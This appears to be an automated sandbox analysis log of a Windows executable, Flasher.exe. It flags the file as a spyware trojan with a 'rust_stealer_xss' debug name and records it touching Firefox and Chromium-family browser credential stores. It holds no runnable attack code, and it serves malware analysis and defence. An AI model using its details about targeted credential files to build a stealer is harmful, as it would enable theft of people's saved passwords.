                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35C292B0_2_00007FF6D35C292B
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35A58EF0_2_00007FF6D35A58EF
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35268E70_2_00007FF6D35268E7
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35348CF0_2_00007FF6D35348CF
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35337A90_2_00007FF6D35337A9
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D352E7780_2_00007FF6D352E778
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35F97940_2_00007FF6D35F9794
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35327900_2_00007FF6D3532790
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D352478E0_2_00007FF6D352478E
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35507700_2_00007FF6D3550770
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D34F28010_2_00007FF6D34F2801
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D366A80C0_2_00007FF6D366A80C
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35EA8000_2_00007FF6D35EA800
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35007BA0_2_00007FF6D35007BA
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35CC69B0_2_00007FF6D35CC69B
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D36856640_2_00007FF6D3685664
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D37396780_2_00007FF6D3739678
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35266E80_2_00007FF6D35266E8
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D36686D80_2_00007FF6D36686D8
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35D36ED0_2_00007FF6D35D36ED
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35EB6C00_2_00007FF6D35EB6C0
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35225980_2_00007FF6D3522598
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D354757D0_2_00007FF6D354757D
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35D85800_2_00007FF6D35D8580
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35EA5400_2_00007FF6D35EA540
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D358B54D0_2_00007FF6D358B54D
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35025D90_2_00007FF6D35025D9
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3601C900_2_00007FF6D3601C90
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D36C0C480_2_00007FF6D36C0C48
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3738D300_2_00007FF6D3738D30
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3506D240_2_00007FF6D3506D24
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D352ED150_2_00007FF6D352ED15
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35F3B9D0_2_00007FF6D35F3B9D
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3562B7C0_2_00007FF6D3562B7C
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3512B620_2_00007FF6D3512B62
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3552B6C0_2_00007FF6D3552B6C
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3513B680_2_00007FF6D3513B68
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D353DA800_2_00007FF6D353DA80
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3725AF00_2_00007FF6D3725AF0
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3540A600_2_00007FF6D3540A60
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D356DA3B0_2_00007FF6D356DA3B
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D34FCB060_2_00007FF6D34FCB06
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35D9AE00_2_00007FF6D35D9AE0
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D356BABA0_2_00007FF6D356BABA
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3736AA90_2_00007FF6D3736AA9
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D36D9AC40_2_00007FF6D36D9AC4
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D352EAC70_2_00007FF6D352EAC7
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D36829800_2_00007FF6D3682980
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D34F494F0_2_00007FF6D34F494F
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D358C9560_2_00007FF6D358C956
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35419600_2_00007FF6D3541960
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35509390_2_00007FF6D3550939
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D354794C0_2_00007FF6D354794C
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35369C00_2_00007FF6D35369C0
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D36059BC0_2_00007FF6D36059BC
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D36049D10_2_00007FF6D36049D1
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D356D0B40_2_00007FF6D356D0B4
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35720690_2_00007FF6D3572069
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35130530_2_00007FF6D3513053
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35361340_2_00007FF6D3536134
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D352F0E40_2_00007FF6D352F0E4
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35F5FB50_2_00007FF6D35F5FB5
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D356AF8C0_2_00007FF6D356AF8C
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35300230_2_00007FF6D3530023
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35510150_2_00007FF6D3551015
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D356BFCC0_2_00007FF6D356BFCC
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35C2FC90_2_00007FF6D35C2FC9
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D36FBEAC0_2_00007FF6D36FBEAC
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3529EA70_2_00007FF6D3529EA7
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3531E900_2_00007FF6D3531E90
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3734F000_2_00007FF6D3734F00
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3525E4B0_2_00007FF6D3525E4B
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3688F200_2_00007FF6D3688F20
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3579EFE0_2_00007FF6D3579EFE
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3600DB50_2_00007FF6D3600DB5
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3602DA80_2_00007FF6D3602DA8
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35FFD860_2_00007FF6D35FFD86
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3513D640_2_00007FF6D3513D64
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3579E220_2_00007FF6D3579E22
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3541E300_2_00007FF6D3541E30
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D34FFE160_2_00007FF6D34FFE16
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3542DE00_2_00007FF6D3542DE0
                Source: C:\Users\user\Desktop\Flasher.exeCode function: String function: 00007FF6D3734750 appears 88 times
                Source: C:\Users\user\Desktop\Flasher.exeCode function: String function: 00007FF6D3734A10 appears 49 times
                Source: C:\Users\user\Desktop\Flasher.exeCode function: String function: 00007FF6D3734B30 appears 33 times
                Source: Flasher.exeBinary string: Failed to open \Device\Afd\Mio:
                Source: Flasher.exeBinary string: 4Afdfd\Device\Afd\Mio
                Source: classification engineClassification label: mal100.troj.spyw.winEXE@4/51@2/2
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D360D459 CoCreateInstance,SysFreeString,CoSetProxyBlanket,SysFreeString,0_2_00007FF6D360D459
                Source: C:\Users\user\Desktop\Flasher.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
                Source: C:\Users\user\Desktop\Flasher.exeFile created: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\Jump to behavior
                Source: Flasher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Flasher.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Users\user\Desktop\Flasher.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: Flasher.exe, 00000000.00000003.1708321442.000001EE77952000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709253050.000001EE77949000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709891281.000001EE79129000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712223125.000001EE79127000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708262684.000001EE77950000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710469922.000001EE79122000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709870787.000001EE79125000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712496047.000001EE79126000.00000004.00000020.00020000.00000000.sdmp, browser_default_login_data.0.dr, coowoo_default_login_data.0.dr, comodo_default_login_data.0.dr, bravesoftware_default_login_data.0.dr, opera stable_default_login_data.0.dr, google_default_login_data.0.dr, kometa_default_login_data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: unknownProcess created: C:\Users\user\Desktop\Flasher.exe "C:\Users\user\Desktop\Flasher.exe"
                Source: C:\Users\user\Desktop\Flasher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Flasher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Flasher.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: Flasher.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: Flasher.exeStatic file information: File size 3266048 > 1048576
                Source: Flasher.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x248e00
                Source: Flasher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Flasher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: rust_stealer_xss.pdb source: Flasher.exe
                Source: C:\Users\user\Desktop\Flasher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
